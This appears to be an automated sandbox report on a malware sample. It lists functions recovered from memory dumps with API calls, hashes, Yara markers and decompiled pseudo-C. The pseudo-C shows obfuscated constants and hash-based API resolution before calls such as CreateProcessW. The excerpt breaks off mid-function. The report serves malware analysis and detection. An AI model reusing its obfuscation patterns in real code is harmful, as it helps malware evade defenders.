Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 3f735c851a4243fb617c35f03e61b2fb2342db04daadcc86d4276004d498c380
Instruction ID: 1595236fc6bb0bc4f81a2f208296ad196a2e3159bbe18b3c330e1b4c99727080
Opcode Fuzzy Hash: 3f735c851a4243fb617c35f03e61b2fb2342db04daadcc86d4276004d498c380
Instruction Fuzzy Hash: 7811C4B5915D19BE6B116BF65C89CAF6A6CDE4A298710082BF50192301FF60DE2582F0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45397D, Relevance: 4.7, APIs: 3, Instructions: 202COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 6E453B2C

Part of subcall function 6E44FC29: RtlAllocateHeap.NTDLL(00000000,?,?,?,6E44A44C,?,?,6E4499B4,00000400,FFFDD001,?,?,?), ref: 6E44FC5B

__freea.LIBCMT ref: 6E453B41
__freea.LIBCMT ref: 6E453B51

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: a6668a7ac72b0847c39ba151487f43055f64ebe067c4345bebb2b9c000e0f5a6
Instruction ID: 28c21e508d65c0a351c642ecb0321aa0600443ae5cf5f80793e09be501b3f373
Opcode Fuzzy Hash: a6668a7ac72b0847c39ba151487f43055f64ebe067c4345bebb2b9c000e0f5a6
Instruction Fuzzy Hash: 9151AFB2600216AFEB118EF5CC58FAB7AADEF45654B11052AFD14D7358EB71CC208AA0

Uniqueness

Uniqueness Score: -1.00%

Function 01ECB3B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01ECB3B4(void* __ecx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t38;
				intOrPtr* _t45;
				void* _t46;
				signed int _t48;

				E01EC358A(_t38);
				_v24 = 0xbdc4da;
				_v20 = 0;
				_v12 = 0x382322;
				_v12 = _v12 | 0x1bf5fedf;
				_v12 = _v12 + 0xffff2b97;
				_v12 = _v12 ^ 0x1bf9dfc9;
				_v16 = 0x4a5b;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x000ec5f6;
				_v8 = 0xbae621;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 >> 8;
				_t48 = 0x3e;
				_v8 = _v8 / _t48;
				_v8 = _v8 ^ 0x00037881;
				_t45 = E01ED0A93(0x7489b63, 0x163, _t48, _t48, 0xd520ec7a);
				_t46 =  *_t45(0, _a28, 0, 0, _a20, __ecx, 0, 0, _a8, 0, _a16, _a20, _a24, _a28); // executed
				return _t46;
			}

0x01ecb3d0
0x01ecb3d5
0x01ecb3df
0x01ecb3e4
0x01ecb3eb
0x01ecb3f2
0x01ecb3f9
0x01ecb400
0x01ecb407
0x01ecb40a
0x01ecb411
0x01ecb418
0x01ecb41c
0x01ecb425
0x01ecb42d
0x01ecb430
0x01ecb44c
0x01ecb45d
0x01ecb463

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 01ECB45D

Strings

"#8, xrefs: 01ECB3E4

Memory Dump Source

Source File: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID: "#8
API String ID: 1514166925-1378059363
Opcode ID: 07da8fd4362dfd3497e595d6f3d2045292be9ff23c55eb80a57e7e5fbfc2e38b
Instruction ID: acef71faf94a2d87f7f2a1778ccf66cae1beeabbd41486f9995cae6112b533ae
Opcode Fuzzy Hash: 07da8fd4362dfd3497e595d6f3d2045292be9ff23c55eb80a57e7e5fbfc2e38b
Instruction Fuzzy Hash: 661164B2C0120CBBDB19DF95DD0A8DEBFB5FF14394F108189F91866250D3B29A60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01EC505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01EC505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E01ED0A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}

0x01ec5065
0x01ec507c
0x01ec5084
0x01ec508b
0x01ec5092
0x01ec509d
0x01ec50a0
0x01ec50a4
0x01ec50ab
0x01ec50b2
0x01ec50b9
0x01ec50c9
0x01ec50d3

APIs

ExitProcess.KERNELBASE(00000000), ref: 01EC50D3

Strings

KxA, xrefs: 01EC50B9

Memory Dump Source

Source File: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID: KxA
API String ID: 621844428-223459762
Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
Instruction ID: 88d46f91447eb8976615594563f62e34471200269c53b5f7f5ba79b51218667d
Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
Instruction Fuzzy Hash: 1001F270D05208FBCB48DFE9D94698DFFB4EB40304F218199E511A72A0D7702B959B05

Uniqueness

Uniqueness Score: -1.00%

Function 6E451EA8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 6E451EE8

Strings

InitializeCriticalSectionEx, xrefs: 6E451EB8

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 7389e2d84a746c436178b298cc6049a5f34acd5644403f489141b64f654021ed
Instruction ID: 175a03e47f8d03ef6f9abba65440f7e87dead35fe9be63b428c0245de5fb3774
Opcode Fuzzy Hash: 7389e2d84a746c436178b298cc6049a5f34acd5644403f489141b64f654021ed
Instruction Fuzzy Hash: 25E012325405A8B7CF512EF1DC09E9F7F15DB45760F014522F91859350CB72C961DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45162D, Relevance: 3.2, APIs: 2, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 6E45115D: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6E451188

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6E451474,?,00000000,?,00000000,?), ref: 6E45168E
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E451474,?,00000000,?,00000000,?), ref: 6E4516D0

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4ae4a5479fe88bd3583594b9339686ee242b01aa17279e10123286cf485a826e
Instruction ID: 3358062bff604ec688b8a1c238c6cb09d15c5bef9582a5bb552445440aab027f
Opcode Fuzzy Hash: 4ae4a5479fe88bd3583594b9339686ee242b01aa17279e10123286cf485a826e
Instruction Fuzzy Hash: F151F474A04B459FEB10CFB9C890EAABBF5EF85304F14886FC0928B351D774955ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E44A114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E44A161

Part of subcall function 6E44A7ED: InitializeSListHead.KERNEL32(6E48B140,6E44A16B,6E487D60,00000010,6E44A0FC,?,?,?,6E44A324,?,00000001,?,?,00000001,?,6E487DA8), ref: 6E44A7F2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E44A1CB

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 4715223803a0d02f0cbf051453b78d20c0d93cf0391ca674273b2f124cca1b0c
Instruction ID: 4e49fee9c2ec078dde5b9aa99a511bfa0ea52a2469e8fed0b58292a9eed6aaf8
Opcode Fuzzy Hash: 4715223803a0d02f0cbf051453b78d20c0d93cf0391ca674273b2f124cca1b0c
Instruction Fuzzy Hash: F521CD32B88285DAFB40ABF49454FD937A5DF0626CF104C3FC5A06A3C2FB626141A6E1

Uniqueness

Uniqueness Score: -1.00%

Function 01EC2C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E01EC2C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E01EC358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E01ED0A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}

0x01ec2c41
0x01ec2c44
0x01ec2c46
0x01ec2c49
0x01ec2c4c
0x01ec2c4d
0x01ec2c4e
0x01ec2c53
0x01ec2c5d
0x01ec2c64
0x01ec2c6b
0x01ec2c72
0x01ec2c79
0x01ec2c80
0x01ec2c87
0x01ec2c8e
0x01ec2caf
0x01ec2cbb
0x01ec2cc1

APIs

lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 01EC2CBB

Strings

&xU`, xrefs: 01EC2C8E

Memory Dump Source

Source File: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: &xU`
API String ID: 1586166983-1954668127
Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
Instruction ID: 95d1bf015fa9de5263f66f174deb54951f0448b927f7fbd015a8e1d30ac93b17
Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
Instruction Fuzzy Hash: 8D011675D01248BBDB04DFD5994A99EBFB4EF14210F00C088E81966220D7719B119B96

Uniqueness

Uniqueness Score: -1.00%

Function 6E44CD91, Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E44CDAF
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 6E44CDBA

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: a63c419139ecec045f9a310904265c547978a4e625c932d4b8a7c454a9474ad3
Instruction ID: 07eb4bc6b9eaf7c1343738f918adb94df3309ae587704bcc29ea6b6f16092dae
Opcode Fuzzy Hash: a63c419139ecec045f9a310904265c547978a4e625c932d4b8a7c454a9474ad3
Instruction Fuzzy Hash: C7D0A7A9318900D979C435F42800C8A1748D9E3278768074FC1209D2C5EF21C00A2551

Uniqueness

Uniqueness Score: -1.00%

Function 6E451231, Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,6E451480,6E451474,00000000), ref: 6E451263

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 197c91b9d1180318f8a0077824dbc91af70df642622adf80613ce9644004885f
Instruction ID: 06487074d410b374129a3a9e252cbf0e033bde91fadf6694393d20f492ca556a
Opcode Fuzzy Hash: 197c91b9d1180318f8a0077824dbc91af70df642622adf80613ce9644004885f
Instruction Fuzzy Hash: 975149719046589EEB118EB8CC90FEA7BBCEB46704F1405AEE199D7742D370A95ACF20

Uniqueness

Uniqueness Score: -1.00%

Function 01ECF66B, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E01ECF66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E01EC358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E01ED0A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}

0x01ecf673
0x01ecf678
0x01ecf67a
0x01ecf67d
0x01ecf67e
0x01ecf681
0x01ecf684
0x01ecf687
0x01ecf688
0x01ecf689
0x01ecf68c
0x01ecf68f
0x01ecf692
0x01ecf695
0x01ecf698
0x01ecf699
0x01ecf69c
0x01ecf69d
0x01ecf69e
0x01ecf6a3
0x01ecf6ad
0x01ecf6bc
0x01ecf6bf
0x01ecf6c2
0x01ecf6c9
0x01ecf6d0
0x01ecf6dc
0x01ecf6dd
0x01ecf6e2
0x01ecf6e9
0x01ecf6fa
0x01ecf6fd
0x01ecf719
0x01ecf733
0x01ecf73a

APIs

CreateProcessW.KERNEL32(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 01ECF733

Memory Dump Source

Source File: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
Instruction ID: 371a6a783656e0f0085ce952802d3ce38da432bfc06168915b8c2fed0636b51e
Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
Instruction Fuzzy Hash: EB21F836900248FBDF15DF95DD0ACDFBFBAEB89700F008049FA1466250D7B69A60DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E451CC7, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b076fa82c10c681c7fac7387495d3846f5e4e53a1eddcdf9f12b3450e7c097
Instruction ID: 9a04c1c30fe96c5fb362bdc32ac7360d3c7113a5e16d8844c90946768f810881
Opcode Fuzzy Hash: 08b076fa82c10c681c7fac7387495d3846f5e4e53a1eddcdf9f12b3450e7c097
Instruction Fuzzy Hash: 3B01D63761091A9FAF529DBEDC40D4B379AAB876707104526F910CB384DA71E8598690

Uniqueness

Uniqueness Score: -1.00%

Function 6E450566, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,6E45017F,00000001,00000364,?,00000005,000000FF,?,?,6E44A44C,?,?,6E4499B4), ref: 6E4505A7

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8c7c781154cd33ccf6f7f016375d2ccb3efe2f4ab39ab6cc7e49a648323b8fe0
Instruction ID: 269d3febad2848db1f82be77dae43466a2846bc52032120f5404d0861a5998f6
Opcode Fuzzy Hash: 8c7c781154cd33ccf6f7f016375d2ccb3efe2f4ab39ab6cc7e49a648323b8fe0
Instruction Fuzzy Hash: 29F0BB3A60562DEBBB61DAF69810E4B3758DF41778B114527EC14A7344EF60D52186E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44DDFC, Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,6E44DE9A,00000001,FlsFree,6E482F84,FlsFree,00000000,?,6E44CDD4,00000004,6E44CA60), ref: 6E44DE2D

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ad913a833a8a02387b5b0ae69337d3a2edb9a88b7b5204e536af6cb516d8bbea
Instruction ID: 3f4b435eb019e91ef610b19048bd9404ed9c568992cc77426a96d4f127225a6d
Opcode Fuzzy Hash: ad913a833a8a02387b5b0ae69337d3a2edb9a88b7b5204e536af6cb516d8bbea
Instruction Fuzzy Hash: DFF08236304A17DFAF515EF9AC00D9A37A8EF51B207210426E928C6280EB31D4108F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E44FC29, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6E44A44C,?,?,6E4499B4,00000400,FFFDD001,?,?,?), ref: 6E44FC5B

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 996eac91b48a9cefdd0de4aea6b597c8f881dbe5e72b40b2e59023cc9dd522a6
Instruction ID: 23913fe9cc76139ca05b9a1bf103f622bffdfe8859d5ddff491b1ebde9d8a798
Opcode Fuzzy Hash: 996eac91b48a9cefdd0de4aea6b597c8f881dbe5e72b40b2e59023cc9dd522a6
Instruction Fuzzy Hash: 99E06531387626DBFA5126F65C44F97769CFF427B4F212537EC9496280CF50D40141E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E43D530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6E43D530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6E443B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6e48adc8; // 0x260000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6E457370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6e47d2be;
							if(_t264 != 0x6e47d2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6e47d2be;
									if(_t229 == 0x6e47d2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6e47d2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6e47d2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6e47d2be;
											if(_t264 == 0x6e47d2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6e47d2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6e47d2be;
												if(_t273 == 0x6e47d2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6e47d2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
